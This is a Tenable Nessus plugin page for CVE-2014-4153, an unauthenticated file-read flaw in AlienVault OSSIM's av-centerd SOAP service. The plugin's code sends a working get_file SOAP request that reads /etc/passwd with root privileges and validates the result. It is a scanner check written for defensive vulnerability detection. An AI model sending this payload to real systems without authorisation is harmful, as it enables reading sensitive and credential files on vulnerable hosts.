
AlienVault OSSIM 'av-centerd' get_file() Information Disclosure

2014-06-25 00:00:00
This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

EPSS

0.301

Percentile

97.0%

The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by an information disclosure vulnerability in the ‘av-centerd’ SOAP service due to a failure to sanitize user input to the ‘get_file’ method. A remote, unauthenticated attacker can exploit this vulnerability to read arbitrary files with root privileges.

Note that this version is reportedly also affected by two remote code execution vulnerabilities. However, Nessus did not test for these additional issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration: when Nessus loads the script with 'description' set it
# only records the metadata below and exits; the check itself runs afterwards.
if (description)
{
  script_id(76214);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2014-4153");
  script_bugtraq_id(68018);

  script_name(english:"AlienVault OSSIM 'av-centerd' get_file() Information Disclosure");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by an information disclosure
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of AlienVault Open Source
Security Information Management (OSSIM) that is affected by an
information disclosure vulnerability in the 'av-centerd' SOAP service
due to a failure to sanitize user input to the 'get_file' method. A
remote, unauthenticated attacker can exploit this vulnerability to
read arbitrary files with root privileges.

Note that this version is reportedly also affected by two remote code
execution vulnerabilities. However, Nessus did not test for these
additional issues.");
  script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/2806");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-207/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to 4.8.0 or later.");
  # CVSSv2: network, low complexity, no auth, complete confidentiality impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-4153");

  # The check below performs the file read itself rather than inferring the
  # flaw from a version string, hence "exploited_by_nessus".
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/06/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:alienvault:open_source_security_information_management");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the plugin sends a request that triggers the flaw on the target.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only after the SOAP service has been detected and its port recorded
  # under the KB key required below.
  script_dependencies("ossim_soap_detect.nbin");
  script_require_ports("www/AlienVault OSSIM 'av-centerd' SOAP Service");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("string.inc");
include("data_protection.inc");

function _soap_create_request(tag, header, body, schema_year)
{
  # Wraps 'body' in a SOAP 1.1 Envelope and returns the resulting XML string.
  #   tag         : namespace prefix used for the Envelope/Header/Body
  #                 elements, defaults to "soapenv"
  #   header      : optional Header element content; omitted when NULL
  #   body        : Body element content; NULL makes the function return NULL
  #   schema_year : year component of the W3C XMLSchema namespace URIs,
  #                 defaults to "2001"
  # The whitespace inside the multi-line literals is part of the payload.
  local_var enc_ns, w3_base, envelope;

  if (isnull(body)) return NULL;

  if (isnull(tag)) tag = "soapenv";
  if (isnull(schema_year)) schema_year = "2001";

  enc_ns = "http://schemas.xmlsoap.org/soap/encoding/";
  w3_base = "http://www.w3.org/" + schema_year;

  # XML prologue plus the opening Envelope element with its namespaces.
  envelope =
    '<?xml version="1.0" encoding="utf-8"?>
      <' + tag + ':Envelope ' + tag + ':encodingStyle="' + enc_ns + '"
        xmlns:SOAP-ENC="' + enc_ns + '"
        xmlns:xsi="' + w3_base + '/XMLSchema-instance"
        xmlns:' + tag + '="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="' + w3_base + '/XMLSchema">';

  # The Header element, when present, precedes the Body.
  if (!isnull(header))
    envelope += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';

  envelope += '<' + tag + ':Body>' + body + '</' + tag + ':Body>
  </' + tag + ':Envelope>';

  return envelope;
}

function soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)
{
  # POSTs a SOAP envelope built from 'request' (the Body content) and the
  # optional 'soap_header' to url:port, and returns the http_send_recv3()
  # result array.
  #   soap_tag     : envelope namespace prefix, defaults to "soapenv"
  #   headers      : HTTP headers to send; when NULL a minimal
  #                  Content-type/User-Agent pair is used
  #   exit_on_fail : passed straight through to http_send_recv3()
  # The SOAPAction header is always set from 'soap_action', overriding any
  # value a caller placed in 'headers'.
  local_var envelope;

  if (isnull(soap_tag)) soap_tag = "soapenv";

  if (isnull(headers))
  {
    headers = make_array(
      "Content-type", "application/soap+xml",
      "User-Agent", "Nessus SOAP v0.0.1 (Nessus.org)"
    );
  }
  headers["SOAPAction"] = soap_action;

  envelope = _soap_create_request(tag:soap_tag, header:soap_header, body:request);

  return http_send_recv3(
    method       : "POST",
    item         : url,
    port         : port,
    add_headers  : headers,
    data         : envelope,
    exit_on_fail : exit_on_fail
  );
}

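# Main check: ask the av-centerd get_file method for /etc/passwd and confirm
# the response contains it. The KB key below is set by ossim_soap_detect.nbin.
app_name = "AlienVault OSSIM 'av-centerd' SOAP Service";
port = get_kb_item_or_exit('www/' + app_name);

# get_file takes a sequence of unnamed <string> arguments; the last one is the
# path to read. /etc/passwd is used because its first line ("root:x:0:0:root")
# is predictable, so the response can be validated without any prior knowledge
# of the target.
method = 'get_file';
method_namespace = 'AV/CC/Util';
soap_action = strcat(method_namespace, '#', method);
url = "/av-centerd";
filename = '/etc/passwd';

request =
'<m:' + method + ' xmlns:m="' + method_namespace + '">
  <string>All</string>
  <string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>
  <string>' + unixtime() + '</string>
  <string>' + SCRIPT_NAME + '</string>
  <string>' + filename + '</string>
</m:' + method + '>';

# exit_on_fail:TRUE makes the helper exit if the HTTP exchange fails, so
# soap_response[2] (the body) is the only element inspected below.
soap_response =
  soap_send_request(
    soap_action:soap_action,
    url:url,
    port:port,
    request:request,
    exit_on_fail:TRUE);

# Verify that the response carries the requested file: the root entry of
# /etc/passwd must appear directly after an XML start tag.
pattern = ">(root:x:0:0:root.*)";
match = pregmatch(string:soap_response[2], pattern:pattern);
if (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);

# Extract the file body for the report: from the root entry up to the closing
# </item>. stridx() cannot miss here because pregmatch() already matched
# ">root:x:0".
contents_start = stridx(soap_response[2], ">root:x:0") + 1;
contents = right(soap_response[2], strlen(soap_response[2]) - contents_start);
contents_end = stridx(contents, "</item>");
# A response without the closing tag (e.g. truncated) would otherwise pass a
# negative length to left(); keep the whole remainder in that case.
if (contents_end >= 0) contents = left(contents, contents_end);
contents = strip(contents);

report = NULL;
attach_file = NULL;
output = NULL;
req = http_last_sent_request();
request = NULL;

if (report_verbosity > 0)
{
  report =
  '\n' + "Nessus was able to obtain the contents of '" + filename + "' with the" +
  '\n' + 'following request :' +
  '\n' +
  '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + 
  '\n' + chomp(req) +
  '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + 
  '\n';

  # Password-file contents are redacted before they can reach the report; the
  # file itself is only attached at the highest verbosity level.
  contents = data_protection::redact_etc_passwd(output:contents);
  if (contents && report_verbosity > 1)
  {
    output = contents;
    request = make_list(req);
    attach_file = filename;
  }
}

security_report_v4(port:port,
                   extra:report,
                   severity:SECURITY_HOLE,
                   request:request,
                   file:attach_file,
                   output:output);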
